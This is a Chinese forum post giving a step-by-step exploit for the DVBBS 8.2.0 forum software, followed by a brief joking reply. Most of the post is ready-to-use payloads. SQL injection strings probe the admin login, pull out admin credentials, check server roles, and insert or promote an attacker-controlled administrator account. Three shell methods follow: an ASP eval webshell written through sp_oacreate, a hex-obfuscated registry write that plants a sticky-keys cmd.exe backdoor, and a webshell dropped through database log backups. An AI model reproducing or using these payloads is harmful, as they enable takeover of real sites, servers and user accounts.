DVBBS 8.2.0漏洞利用+拿shell详解
管理用户' and '1'='1 用户名或者密码不正确.<BR>管理用户' ' and '1'='2 本论坛不存在该用户名.<BR>如果两次返回结果不同说明漏洞存在<BR>下面判断数据库类型:<BR>;and (select count(*) from sysobjects)>0<BR>;and (select count(*) from msysobjects)>0 <BR>判断admin是否存在:<BR>admin' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1<P>admin' and 1=(select count(*) from dv_admin where left(password,1)='a') and '1'='1</P>
<P>判断权限:<BR>' and (select is_srvrolemember('sysadmin'))>0--<BR>' and (select IS_MEMBER('db_owner'))>0--</P>
<P>af0378da05f63f89=abcd1234<BR>方法一:注册用户</P>
<P>修改密码:</P>
<P>注册的用户(tester)';update dv_user set password='af0378da05f63f89' where username='tester'--</P>
<P>加入到管理组:</P>
<P>注册的用户(tester)';update dv_user set usergroupid=1 where username='tester'--</P>
<P>方法二:直接建用户</P>
<P>新建用户并加到管理组</P>
<P>存在的用户(admin)';insert into dv_user (username,userpassword,usergroupid) values('tester','af0378da05f63f89','1')--</P>
<P>存在的用户(admin)';insert into dv_admin (username,password,flag,adduser) values</P>
<P>('tester','af0378da05f63f89','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3</P>
<P>2,33,34,35,36,37,38,39,40,41,42,43,44,45','tester')--</P>
<P><BR>清理用户<BR>delete from dv_admin where username='tester'<BR>delete from dv_user where username='tester'</P>
<P>拿webshell思路:<BR>第一种:<BR>DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001</P>
<P>\Services\W3SVC\Parameters\Virtual Roots', '/' ,<BR>@result output insert into web (gyfd) values(@result);<BR>update dv_user set useremail =@result where username='bugtest1';</P>
<P>先把你个人的邮件地址修改成网站目录,然后再</P>
<P>declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o,</P>
<P>'createtextfile', @f out, '上面得到的目录加木马地址', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<%eval</P>
<P>request("#")%>';--<BR>第二种:<BR>映射劫持-5shift后门<BR>declare @s varchar(4000) set @s=cast</P>
<P>(0x657865632078705F72656777726974652027484B45595F4C4F43414C5F4D414348494E45272C27534F4654574152455C4D6963726F736F667</P>
<P>45C57696E646F7773204E545C43757272656E7456657273696F6E5C496D6167652046696C6520457865637574696F6E204F7074696F6E735C736</P>
<P>57468632E657865272C276465627567676572272C277265675F737A272C27633A5C77696E646F77735C73797374656D33325C636D642E6578652</P>
<P>7DA as varchar(4000));exec(@s);</P>
<P>第三种:<BR>找到网站路径BAKLOG TO A webshell<BR>alter database XXX set RECOVERY FULL--<BR>create table cmd (a image)-- <BR>backup log XXX to disk = 'c:\cmd' with init--<BR>insert into cmd (a) values ('<%%25eval(request("a")):response.end%%25>')--<BR>backup log XXX to disk = 'e:\web\test.asp'--<BR>drop table cmd-- <BR>alter database XXX set RECOVERY SIMPLE--</P>
re:DVBBS 8.2.0漏洞利用+拿shell详解
...........................这是当然啦.哈哈哈哈,
页:
[1]